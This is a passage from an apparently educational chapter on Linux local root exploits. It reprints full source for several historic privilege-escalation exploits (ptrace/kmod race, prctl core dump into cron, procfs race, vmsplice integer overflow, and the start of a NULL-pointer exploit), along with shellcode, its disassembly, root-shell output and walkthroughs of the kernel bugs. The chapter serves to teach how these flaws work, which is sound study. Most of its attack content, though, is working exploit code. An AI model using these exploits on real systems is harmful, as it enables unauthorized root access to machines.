
12. Local root exploits

Once one has access to some machine, it is usually possible to "get root". Certainly physical access suffices - boot from a prepared boot floppy or CDROM, or, in case the BIOS and boot loader are password protected, open the case and short the BIOS battery (or replace the disk drive). (If opening the case is also impossible because of locks, then one did not really have physical access.)

But usually no physical action is required. Any system has flaws, and there will be some time between the moment they are discovered and the moment they are fixed.

12.1 A Linux example - ptrace

Let us discuss a recent Linux kernel flaw found in January and again in March 2003. The function ptrace() is used by debuggers, and allows programs like gdb to examine and change the state of a program. This function has a long history of exploits. The most recent one goes as follows.

The Linux kernel can use modules, sections of code loaded at run time - usually drivers for some hardware, or code for some type of filesystem, or some network protocol. One can load such modules by hand, but when the kmod feature was enabled at compile time, the kernel will load modules automatically when they are needed. The file /proc/sys/kernel/modprobe contains the name of the module loader - a user space program that knows where in the filesystem it should look for modules. Thus, on a kernel where kmod was not enabled:

% cat /proc/sys/kernel/modprobe
cat: /proc/sys/kernel/modprobe: No such file or directory
but on a kernel where kmod was enabled:
% cat /proc/sys/kernel/modprobe
/sbin/modprobe
(There is no real way to disable kmod, but the exploit described below will fail when one echoes /no/such/file to /proc/sys/kernel/modprobe.)

A user process can trace processes with the same user ID, but it cannot trace arbitrary processes. One will get "Permission denied" on an attempt to start tracing a setuid root program. And rightly so, for the tracer can make the tracee do anything it wants.

But now suppose some program needs a feature for which some module must be loaded. The kernel will spawn a child process /sbin/modprobe (or whatever it found in /proc/sys/kernel/modprobe), set its euid and egid to 0 and execute it.

If we can start tracing this child before euid and egid are changed, then we can insert arbitrary code into the child, let it run, and lo! we get what we want.

That is what happens in the exploit below.

/*
 * Linux kernel ptrace/kmod local root exploit
 *
 * This code exploits a race condition in kernel/kmod.c, which creates
 * kernel thread in insecure manner. This bug allows to ptrace cloned
 * process and to take control over privileged modprobe binary.
 *
 * Should work under all current 2.2.x and 2.4.x kernels.
 * 
 * I discovered this stupid bug independently on January 25, 2003, that
 * is (almost) two month before it was fixed and published by Red Hat
 * and others.
 * 
 * Wojciech Purczynski <cliph@isec.pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 * 
 * (c) 2003 Copyright by iSEC Security Research
 *
 * Fixed off-by-one flaw, aeb.
 */

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

char cliphcode[] =
        "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
        "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
        "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
        "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
        "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;

void fatal(char * msg)
{
        perror(msg);
        kill(parent, SIGKILL);
        kill(child, SIGKILL);
        kill(victim, SIGKILL);
}

void putcode(unsigned long * dst)
{
        char buf[MAXPATHLEN + CODE_SIZE];
        unsigned long * src;
        int i, len;

        memcpy(buf, cliphcode, CODE_SIZE);
        len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
        if (len == -1)
                fatal("[-] Unable to read /proc/self/exe");

        len += CODE_SIZE;
        buf[len++] = '\0';
        
        src = (unsigned long*) buf;
        for (i = 0; i < len; i += 4)
                if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
                        fatal("[-] Unable to write shellcode");
}

void sigchld(int signo)
{
        struct user_regs_struct regs;

        if (gotchild++ == 0)
                return;
        
        fprintf(stderr, "[+] Signal caught\n");

        if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
                fatal("[-] Unable to read registers");
        
        fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);
        
        putcode((unsigned long *)regs.eip);

        fprintf(stderr, "[+] Now wait for suid shell...\n");

        if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
                fatal("[-] Unable to detach from victim");

        exit(0);
}

void sigalrm(int signo)
{
        errno = ECANCELED;
        fatal("[-] Fatal error");
}

void do_child(void)
{
        int err;

        child = getpid();
        victim = child + 1;

        signal(SIGCHLD, sigchld);

        do
                err = ptrace(PTRACE_ATTACH, victim, 0, 0);
        while (err == -1 && errno == ESRCH);

        if (err == -1)
                fatal("[-] Unable to attach");

        fprintf(stderr, "[+] Attached to %d\n", victim);
        while (!gotchild) ;
        if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
                fatal("[-] Unable to setup syscall trace");
        fprintf(stderr, "[+] Waiting for signal\n");

        for(;;);
}

void do_parent(char * progname)
{
        struct stat st;
        int err;
        errno = 0;
        socket(AF_SECURITY, SOCK_STREAM, 1);
        do {
                err = stat(progname, &st);
        } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);
        
        if (err == -1)
                fatal("[-] Unable to stat myself");

        alarm(0);
        system(progname);
}

void prepare(void)
{
        if (geteuid() == 0) {
                initgroups("root", 0);
                setgid(0);
                setuid(0);
                execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
                fatal("[-] Unable to spawn shell");
        }
}

int main(int argc, char ** argv)
{
        prepare();
        signal(SIGALRM, sigalrm);
        alarm(10);
        
        parent = getpid();
        child = fork();
        victim = child + 1;
        
        if (child == -1)
                fatal("[-] Unable to fork");

        if (child == 0)
                do_child();
        else
                do_parent(argv[0]);

        return 0;
}

Exercise: Study the above code carefully. What does this cliphcode do?

Hint: ask gdb to disassemble it. One gets

/*
 * a: syscall number
 * b, c, d: args
 * chown(path, owner, group)
 * chmod(path, mode)
 * exit(status)
 *
0x8049020 <cliphcode>:          nop
0x8049021 <cliphcode+1>:        nop
0x8049022 <cliphcode+2>:        jmp    0x8049043 <cliphcode+35>
0x8049024 <cliphcode+4>:        mov    $0xb6,%eax       / 182 = __NR_chown
0x8049029 <cliphcode+9>:        pop    %ebx             / path
0x804902a <cliphcode+10>:       xor    %ecx,%ecx        / owner 0
0x804902c <cliphcode+12>:       mov    %ecx,%edx        / group 0
0x804902e <cliphcode+14>:       int    $0x80
0x8049030 <cliphcode+16>:       mov    $0xf,%eax        / 15 = __NR_chmod
0x8049035 <cliphcode+21>:       mov    $0xded,%ecx      / mode 06755
0x804903a <cliphcode+26>:       int    $0x80
0x804903c <cliphcode+28>:       mov    %edx,%eax
0x804903e <cliphcode+30>:       mov    %edx,%ebx        / status 0
0x8049040 <cliphcode+32>:       inc    %eax             / 1 = __NR_exit
0x8049041 <cliphcode+33>:       int    $0x80
0x8049043 <cliphcode+35>:       call   0x8049024 <cliphcode+4>
0x8049048 <cliphcode+40>:
*/
where I added the comments.

Exercise: The code above uses the proc filesystem. How should it be modified when proc is unavailable?

The peculiar socket() call in do_parent() uses an unimplemented address family: the kernel does not know AF_SECURITY and will ask whether there is a module that does. Typically the call will look like /sbin/modprobe -s -k net-pf-14.

I found two incarnations of this exploit on the net, km3.c by Andrzej Szombierski (anszom), and isec-ptrace-kmod-exploit.c by Wojciech Purczynski (cliph), and two derived versions, myptrace.c by snooq, and the heavily commented ptrace.c by Sed. Not all of these work for me. I tried the one above, and after fixing an off-by-one bug, and realising that things had failed because I was running it on an NFS-mounted filesystem, it gave me a root shell:

[+] Attached to 11930
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
sh-2.05# 

This problem was fixed in Linux 2.4.21.

12.2 A Linux example - prctl

Playing with core dumps is a well-known technique. The contents of the dump can be partially determined by having suitable strings in the executable or environment. If an interpreter is so friendly as to ignore all garbage, possibly only producing some error messages, then it can be made to execute arbitrary commands. Either dump to a predetermined file, for example via a symlink, or dump in a suitable directory where all files are meaningful. Here is an example of the latter, dumping to /etc/cron.d.

An exploit from July 2006.

/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer    <luna@aditel.org>   (main PoC code)   */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for approx. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");
}

From man prctl:

       PR_SET_DUMPABLE (since Linux 2.3.20)
              Set  the  state  of the flag determining whether core dumps are produced for this
              process upon delivery of a signal whose default behavior is  to  produce  a  core
              dump.   (Normally  this  flag  is set for a process by default, but it is cleared
              when a set-user-ID or set-group-ID program is executed and also by various system
              calls  that  manipulate  process  UIDs and GIDs).  In kernels up to and including
              2.6.12, arg2 must be either  0  (process  is  not  dumpable)  or  1  (process  is
              dumpable).   Between  kernels  2.6.13 and 2.6.17, the value 2 was also permitted,
              which caused any binary which normally would not be dumped to be dumped  readable
              by root only; for security reasons, this feature has been removed.  (See also the
              description of /proc/sys/fs/suid_dumpable in proc(5).)
so the dump that normally would not have been permitted occurred here and gave a core file readable by root only. Fortunately cron is root and executes the contents (every minute, but the first execution already removes the core file again).

The payload could be improved. For example, many shells will drop privileges so that a suid shell doesn't work. But of course this is an entirely convincing proof-of-concept.

12.3 A Linux example - a race in procfs

A few days later: Another exploit from July 2006. Again involving PR_SET_DUMPABLE, but in an entirely different way.

/*
** Author: h00lyshit
** Vulnerable: Linux 2.6 ALL
** Type of Vulnerability: Local Race
** Tested On : various distros
** Vendor Status: unknown
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
** Compile:
** gcc h00lyshit.c -o h00lyshit
**
** Usage:
** h00lyshit <very big file on the disk>
**
** Example:
** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
**
** if y0u dont have one, make big file (~100MB) in /tmp with dd
** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>


static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;


/*      h00lyshit shell code            */
__asm__ ("      __excode:       call    1f                      \n"
         "      1:              mov     $23, %eax               \n"
         "                      xor     %ebx, %ebx              \n"
         "                      int     $0x80                   \n"
         "                      pop     %eax                    \n"
         "                      mov     $cmd-1b, %ebx           \n"
         "                      add     %eax, %ebx              \n"
         "                      mov     $arg-1b, %ecx           \n"
         "                      add     %eax, %ecx              \n"
         "                      mov     %ebx, (%ecx)            \n"
         "                      mov     %ecx, %edx              \n"
         "                      add     $4, %edx                \n"
         "                      mov     $11, %eax               \n"
         "                      int     $0x80                   \n"
         "                      mov     $1, %eax                \n"
         "                      int     $0x80                   \n"
         "      arg:            .quad   0x00, 0x00              \n"
         "      cmd:            .string         \"/bin/sh\"     \n"
         "      __excode_e:     nop                             \n"
         "      .global         __excode                        \n"
         "      .global         __excode_e                      \n"
        );

extern void (*__excode) (void);
extern void (*__excode_e) (void);

void error (char *err) {
  perror (err);
  fflush (stderr);
  exit (1);
}


/*      exploit this shit       */
void exploit (char *file) {
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);
  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /*      slow down machine       */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*      give it a try           */
  if (i) {                  
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();   
  } else {
            nice(10);
            while (!(*c));
                sched_yield ();
      execve (t, a, e);
      error ("failed");
  }

  waitpid (i, NULL, 0);
  exit (0);
}


int main (int ac, char **av) {
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary <big file name>");
  if (ac > 2)
    exploit (av[2]);
  printf ("\npreparing");
  fflush (stdout);

  /*      make setuid a.out       */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /*      make environment        */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++) {
      if (!p[i]) {
          e[j++] = &p[k];
          k = i + 1;
      }
  }

  /*      reexec                  */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}

What happens? We start with ac==2. Construct an a.out format binary in the array b[], first the header from ex, then the code from __excode. Construct an environment that is identical to the binary. The NULs that cannot be inside the strings are just the string terminators. Reexec ourselves with ac==3, and with the environment just constructed.

So far the preparation. The real stuff happens in exploit(). Make the binary file /proc/self/environ suid and executable. Set this binary to non-dumpable. Do various silly things and fork. If we are the parent, set a flag, ask to preread a large file, and set the binary to dumpable again. If we are the child, wait for the flag, and then exec this suid binary file. Bingo! or not.

The kernel, in fs/proc/base.c, has code like

proc_pid_make_inode() {
        ...
        inode->i_uid = 0;
        if (dumpable)
                inode->i_uid = task->euid;
        ...
}
If dumping core is not allowed, root is the owner of the proc files, otherwise the effective user is the owner. The first PR_SET_DUMPABLE call inhibits core dumps, so root will be the owner. But if root is the owner, then ordinary reading, needed for the exec, will fail: the read method of /proc/.../environ is proc_pid_environ(), and it will allow reading only when ptrace_may_attach() returns true, and that latter function tests the dumpable flag. Quickly change back to dumpable, namely after the file's owner has been set, and before its readability was denied. A race.

If we win the race then the prepared binary is executed suid root.

12.4 A Linux integer overflow - vmsplice

More recent kernels are vulnerable to the following (Feb 2008) exploit of mmap/vmsplice.

/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound     14
#define uint            unsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)        (x + sizeof(x) - 40)

struct page {
        unsigned long flags;
        int count;
        int mapcount;
        unsigned long private;
        void *mapping;
        unsigned long index;
        struct { long next, prev; } lru;
};

void    exit_code();
char    exit_stack[1024 * 1024];

void    die(char *msg, int err)
{
        printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
        fflush(stdout);
        fflush(stderr);
        exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS         0x73
#define USER_SS         0x7b
#define USER_FL         0x246

static_inline
void    exit_kernel()
{
        __asm__ __volatile__ (
        "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
        );
}

static_inline
void *  get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
        "movl %%esp, %%eax ;"
        "andl %1, %%eax ;"
        "movl (%%eax), %0"
        : "=r" (curr)
        : "i" (~8191)
        );
        return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS         0x23
#define USER_SS         0x2b
#define USER_FL         0x246

static_inline
void    exit_kernel()
{
        __asm__ __volatile__ (
        "swapgs ;"
        "movq %0, 0x20(%%rsp) ;"
        "movq %1, 0x18(%%rsp) ;"
        "movq %2, 0x10(%%rsp) ;"
        "movq %3, 0x08(%%rsp) ;"
        "movq %4, 0x00(%%rsp) ;"
        "iretq"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
        );
}

static_inline
void *  get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
        "movq %%gs:(0), %0"
        : "=r" (curr)
        );
        return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
        long, _vmsplice,
        int, fd,
        struct iovec *, iov,
        unsigned long, nr_segs,
        unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void    kernel_code()
{
        int     i;
        uint    *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid &&
                    p[2] == uid && p[3] == uid &&
                    p[4] == gid && p[5] == gid &&
                    p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }       

        exit_kernel();
}

void    exit_code()
{
        if (getuid() != 0)
                die("wtf", 0);

        printf("[+] root\n");
        putenv("HISTFILE=/dev/null");
        execl("/bin/bash", "bash", "-i", NULL);
        die("/bin/bash", errno);
}

int     main(int argc, char *argv[])
{
        int             pi[2];
        size_t          map_size;
        char *          map_addr;
        struct iovec    iov;
        struct page *   pages[5];

        uid = getuid();
        gid = getgid();
        setresuid(uid, uid, uid);
        setresgid(gid, gid, gid);

        printf("-----------------------------------\n");
        printf(" Linux vmsplice Local Root Exploit\n");
        printf(" By qaaz\n");
        printf("-----------------------------------\n");

        if (!uid || !gid)
                die("!@#$", 0);

        /*****/
        pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
        pages[1] = pages[0] + 1;

        map_size = PAGE_SIZE;
        map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[0]);
        printf("[+] page: 0x%lx\n", pages[1]);

        pages[0]->flags    = 1 << PG_compound;
        pages[0]->private  = (unsigned long) pages[0];
        pages[0]->count    = 1;
        pages[1]->lru.next = (long) kernel_code;

        /*****/
        pages[2] = *(void **) pages[0];
        pages[3] = pages[2] + 1;

        map_size = PAGE_SIZE;
        map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[2]);
        printf("[+] page: 0x%lx\n", pages[3]);

        pages[2]->flags    = 1 << PG_compound;
        pages[2]->private  = (unsigned long) pages[2];
        pages[2]->count    = 1;
        pages[3]->lru.next = (long) kernel_code;

        /*****/
        pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
        map_size = PAGE_SIZE;
        map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);
        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[4]);

        /*****/
        map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
        map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
                die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

        /*****/
        map_size -= 2 * PAGE_SIZE;
        if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
                die("munmap", errno);

        /*****/
        if (pipe(pi) < 0) die("pipe", errno);
        close(pi[0]);

        iov.iov_base = map_addr;
        iov.iov_len  = ULONG_MAX;

        signal(SIGPIPE, exit_code);
        _vmsplice(pi[1], &iov, 1, 0);
        die("vmsplice", errno);
        return 0;
}

The question remains what this does, and why it works.

In main() we have an array pages of pointers to a struct page. We first do (on a 32-bit machine; otherwise 64-bit addresses are written in pages[0] and pages[4], with 0 in one half and 4096 in the other half)

        pages[0] = 0;
        pages[1] = 32;
        pages[2] = 16384;
        pages[3] = 16416;
        pages[4] = 4096;
Here 32 is sizeof(struct page) and 16384 is 1<<PG_compound and 4096 is PAGE_SIZE. One page of memory (4096 bytes) is mapped at each of the three fixed addresses 0 and 16384 and 4096. And 50 pages of memory are mapped at some arbitrary place P (PIPE_BUFFERS is 16), and the 49th page is unmapped again. A pipe is created, its reading end is closed. We set the signal routine that must be called when we get the SIGPIPE signal (for writing to a pipe without readers). Now we do vmsplice() on its writing end. This maps the memory area starting at P and with length ULONG_MAX into the (writing end of) a pipe. Ha! An integer overflow bug in the kernel. It fails to see that ULONG_MAX is more than fits.

But now, what happens? Let me read 2.6.24 code. We start with sys_vmsplice() in fs/splice.c. It calls vmsplice_to_pipe(), which calls get_iovec_page_array() and there

        int buffers = 0;

        base = entry.iov_base;
        len = entry.iov_len;
        off = (unsigned long) base & ~PAGE_MASK;
        npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
        if (npages > PIPE_BUFFERS - buffers)
                npages = PIPE_BUFFERS - buffers;
(so off = 0, len = -1, npages = 0, and the last two lines, designed to test for overflow, do not notice anything). Now we fetch these 0 pages:
        error = get_user_pages(current, current->mm, base, npages, 0, 0,
                               &pages[buffers], NULL);
This function lives in mm/memory.c and is a big
        do {
                ...
                if (!vma)
                        return i ? : -EFAULT;
                ...
                pages[i] = page;
                ...
                i++;
                start += PAGE_SIZE;
                len--;
        } while (len && start < vma->vm_end);
loop, where len is the npages parameter. Since that was 0, this loop never finishes by completing the copy of the required number of pages - instead it finishes when it reaches the end of the mapped area, after 48 pages, overflowing the pages[] array. So, the stack of vmsplice_to_pipe() is corrupted.

When get_user_pages() returns, get_iovec_page_array() also fills the array partial, also overflowing that:

                for (i = 0; i < error; i++) {
                        const int plen = min(len, PAGE_SIZE);

                        partial[buffers].offset = 0;
                        partial[buffers].len = plen;
                        len -= plen;
                        buffers++;
                }
Here error is the return value of get_user_pages(), the number of user pages gotten, 48, and partial is an array of structs
struct partial_page {
        unsigned int offset;
        unsigned int len;
        unsigned long private;
};
filled with a repeated (0, 4096, ?). This overflows the array partial and thereafter also the array pages:
static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov,
                             unsigned long nr_segs, unsigned int flags)
{
        struct pipe_inode_info *pipe;
        struct page *pages[PIPE_BUFFERS];
        struct partial_page partial[PIPE_BUFFERS];
        struct splice_pipe_desc spd = {
                .pages = pages,
                .partial = partial,
                .flags = flags,
                .ops = &user_page_pipe_buf_ops,
        };
        ...
        get_iovec_page_array(iov, nr_segs, pages, partial,
                             flags & SPLICE_F_GIFT);
        ...
        return splice_to_pipe(pipe, &spd);
}

Now splice_to_pipe() is called. We read

        for (;;) {
                if (!pipe->readers) {
                        send_sig(SIGPIPE, current, 0);
                        break;
                }
                ...
        }
        while (page_nr < spd_pages)
                page_cache_release(spd->pages[page_nr++]);

There are no readers since we closed the reading end, and a signal is generated. The get_user_pages() had done follow_page() which does a get_page() which does atomic_inc(&page->_count). Now a release is done for all pages involved and the function put_page() (in mm/swap.c) is called on each. But the page struct pointers were overwritten with 0 and 4096, so the kernel looks there, that is, in user memory instead of kernel memory. The mmap calls have prepared some memory there containing valid-looking page structs, and these have the "compound page" bit set. Consequently, the put_compound_page() routine is called, and

static void put_compound_page(struct page *page)
{
        page = compound_head(page);
        if (put_page_testzero(page)) {
                compound_page_dtor *dtor;

                dtor = get_compound_page_dtor(page);
                (*dtor)(page);
        }
}
it finds the destructor routine address in the compound page struct, and calls that. Aha.

Our routine kernel_code() is called, it finds the place in the kernel where uid and gid are stored (that is why the exploit starts testing whether we are root already - there are too many places that contain 0), and stores 0 there. The pointer current points at the current task_struct (defined in <linux/sched.h>) which has

        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;
        struct group_info *group_info;
        kernel_cap_t   cap_effective, cap_inheritable, cap_permitted;
        unsigned keep_capabilities:1;
and we see that the final assignments in kernel_code() give the process all capabilities. Now we return and start a root shell.
% ./qaaz
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40158000 .. 0x4018a000
[+] root
#

Yes, it works (on plain 2.6.24).

12.5 A Linux NULL pointer exploit

The kernel uses operations structures everywhere, so that if we have to do foo() on an object x, the kernel does x->ops->foo(). If one is a careful programmer and prefers robust code, one would write

        if (x->ops && x->ops->foo)
                x->ops->foo();
and indeed, this occurs all over the place in Linus' original code. That is local correctness: one sees at the call site that the pointer is non-NULL. Over time, the kernel source has moved in the direction of global correctness (only): after reading the entire kernel source one sees that x->ops->foo is never NULL, so that the test is superfluous, and deletes the test. Of course this leads to fragile code, difficult to maintain.

If one makes a mistake, and one always does, the direct result would be a call of a function at address 0, probably followed by a kernel crash. This can be exploited as a DoS. It becomes a local root exploit if it is possible to map address 0 in user space and put suitable code there. Below is an example that works on my machine (August 2009).

First the code that starts the exploit:

#include <sys/personality.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
        if (personality(PER_SVR4) < 0) {
                perror("personality");
                return -1;
        }

        fprintf(stderr, "padlina z lublina!\n");

        execl("./exploit", "exploit", 0);
}
and then the actual exploit (for an i386):
/*
 * 14.08.2009, babcia padlina
 *
 * vulnerability discovered by google security team
 *
 * some parts of exploit code borrowed from vmsplice exploit by qaaz
 * per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy:
 *     http://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
 */

#include <stdio.h>
#include <sys/socket.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/personality.h>

static unsigned int uid, gid;

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
#define STACK(x) (x + sizeof(x) - 40)

void exit_code();
char exit_stack[1024 * 1024];

static inline __attribute__((always_inline)) void *get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
                "movl %%esp, %%eax ;"
                "andl %1, %%eax ;"
                "movl (%%eax), %0"
                : "=r" (curr)
                : "i" (~8191)
        );
        return (void *) curr;
}

static inline __attribute__((always_inline)) void exit_kernel()
{
        __asm__ __volatile__ (
                "movl %0, 0x10(%%esp) ;"
                "movl %1, 0x0c(%%esp) ;"
                "movl %2, 0x08(%%esp) ;"
